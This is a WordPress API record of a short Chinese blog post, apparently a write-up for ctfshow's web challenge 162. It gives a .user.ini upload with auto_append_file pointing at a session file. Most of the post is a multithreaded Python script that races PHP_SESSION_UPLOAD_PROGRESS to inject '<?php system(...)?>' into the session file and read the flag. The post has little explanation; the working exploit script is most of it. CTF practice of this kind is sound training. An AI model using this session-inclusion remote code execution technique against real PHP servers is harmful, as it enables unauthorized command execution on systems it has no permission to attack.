{"id":41,"date":"2026-05-21T13:55:57","date_gmt":"2026-05-21T05:55:57","guid":{"rendered":"http:\/\/tangjin.xyz\/?p=41"},"modified":"2026-05-21T13:58:16","modified_gmt":"2026-05-21T05:58:16","slug":"ctfshow_web%e5%85%a5%e9%97%a8162","status":"publish","type":"post","link":"http:\/\/tangjin.xyz\/index.php\/2026\/05\/21\/ctfshow_web%e5%85%a5%e9%97%a8162\/","title":{"rendered":"ctfshow_web\u5165\u95e8162"},"content":{"rendered":"\n<p>\u4f20\u5165.user.ini<br>\u5185\u5bb9\uff1aGIF89a auto_append_file=\/tmp\/sess_zho<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/tangjin.xyz\/wp-content\/uploads\/2026\/05\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"881\" height=\"692\" data-original=\"http:\/\/tangjin.xyz\/wp-content\/uploads\/2026\/05\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-42\"  sizes=\"auto, (max-width: 881px) 100vw, 881px\" \/><\/div><\/figure>\n\n\n\n<p><code>import re<\/code><br><code>import requests<\/code><br><code>import threading<\/code><br><code>import urllib3<\/code><br><code>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<\/code><\/p>\n\n\n\n<p><code>url1=\"https:\/\/ba75f5ef-6391-4662-ad6f-e75ef59534f8.challenge.ctf.show\/\"<\/code><br><code>url2=\"https:\/\/ba75f5ef-6391-4662-ad6f-e75ef59534f8.challenge.ctf.show\/upload\"<\/code><br><code>se=requests.Session()<\/code><br><code>file={<\/code><br><code>'file':'111'<\/code><\/p>\n\n\n\n<p><code>}<\/code><br><code>date = {<\/code><br><code>'PHP_SESSION_UPLOAD_PROGRESS': '&lt;?php system(\"tac ..\/f*\");?&gt;' # \u4f7f\u7528system\u51fd\u6570\u6267\u884c\u547d\u4ee4<\/code><br><code>}<\/code><br><code>sess='zho'<\/code><br><code>cookie={<\/code><br><code>'PHPSESSID': 'zho'<\/code><br><code>}<\/code><br><code>def upload_file():<\/code><br><code>while True:<\/code><br><code>se.post(url1,data=date,cookies=cookie,files=file,verify=False)<\/code><\/p>\n\n\n\n<p><code>def check_flag():<\/code><br><code>while True:<\/code><br><code>text=se.get(url2,verify=False)<\/code><br><code>if 'flag'in text.text:<\/code><br><code>flag = re.search(r'ctfshow{.+}', text.text)<\/code><br><code>print(flag)<\/code><\/p>\n\n\n\n<p><code>threads = [<\/code><br><code>threading.Thread(target=upload_file),<\/code><br><code>threading.Thread(target=check_flag)<\/code><br><code>]<\/code><br><code>for t in threads:<\/code><br><code>t.start()<\/code><\/p>\n\n\n\n<p>\u6267\u884c\u4ee3\u7801\u5373\u53ef<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4f20\u5165.user.ini\u5185\u5bb9\uff1aGIF89a auto_append_file=\/tmp\/sess_zho imp [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":31,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-41","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-wp"],"_links":{"self":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/41","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/comments?post=41"}],"version-history":[{"count":3,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions"}],"predecessor-version":[{"id":46,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions\/46"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/media\/31"}],"wp:attachment":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/media?parent=41"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/categories?post=41"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/tags?post=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}